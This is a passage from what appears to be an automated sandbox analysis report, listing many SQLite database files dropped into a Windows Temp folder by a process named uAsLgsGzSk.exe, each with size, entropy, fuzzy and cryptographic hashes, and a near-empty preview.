                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\mLEMjS6Vjv

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\mg8otx2Ufq

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\mgaXW1gCdR

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\n6KBSMlABB

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\nGl3QBNVkG

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\nOFyiBTAiS

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\nd4llKLQfk

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\nmHrccIoBq

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\nyzFZHnfhZ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\oajajD4LcO

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\odG4Jf4V8l

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\omiPcwbmsd

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ooKgCi3rjf

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\pnsvpWHdBo

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\q51jzPnYAV

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\q5YnDlkpA1

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\qt7NsSrBtr

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\rkGN08ApGn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\roL1791RKk

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\s41XjVl30q

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\sHdAduQ9eT

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\sHdJQtl6jQ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\sU49SJPTFu

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
